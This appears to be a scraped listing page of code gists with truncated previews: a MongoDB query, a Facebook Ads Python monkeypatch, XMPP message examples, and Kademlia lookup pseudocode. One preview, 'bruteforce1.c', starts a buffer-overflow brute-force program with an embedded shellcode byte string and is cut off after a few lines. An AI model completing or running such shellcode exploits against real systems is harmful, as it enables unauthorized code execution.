This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| db.sjse_match_share.find({ | |
| page_id:180463558653282, | |
| $or: [ | |
| {gooddata_exportable:true}, | |
| {gooddata_exportable: {$exists: 0}} | |
| ], { | |
| share_wording:1, | |
| uid:1, | |
| post_tentative_at:1 | |
| }).map(function(b){ |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Monkeypatch AdAccount to have async report support | |
| import facebookads | |
| import time | |
| class ReportStatsAsyncJob(facebookads.objects.AbstractCrudObject): | |
| class Field(object): | |
| id = "id" | |
| async_status = "async_status" | |
| async_percent_completion = "async_percent_completion" |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <message from='juliet@example.com' | |
| to='romeo@example.net' | |
| xml:lang='en'> | |
| <body>Art thou not Romeo, and a Montague?</body> | |
| </message> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # in this algorithm, all notions of *sorting*, *close* or *distance* | |
| # are relative to the XOR distance with the target ID | |
| # as defined in the Kademlia spec | |
| - iterative find (target ID) -> | |
| # initializations | |
| HeardOf <- XOR Sorted Array of peers | |
| initialized with the 50 (or less) closest peers we know from the our routing table | |
| Reached <- XOR Sorted Array of peers | |
| Queried <- Array of peers |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* gcc -o bruteforce1 bruteforce1.c */ | |
| #include <stdlib.h> | |
| #define BUFFER_LEN 301 | |
| #define OVERFLOW 8 | |
| int main() | |
| { | |
| /* | |
| char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07" |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body xmlns="http://jabber.org/protocol/httpbind"> | |
| <iq from="bot8@kadoh.fr.nf/9107" id="gV" to="alexstrat@jabber.org/kadoh" type="result" xmlns="jabber:client"> | |
| <query xmlns="jabber:iq:rpc"> | |
| <methodResponse> | |
| <params> | |
| <param> | |
| <value> | |
| <struct> | |
| <member> | |
| <name>nodes</name> |
OlderNewer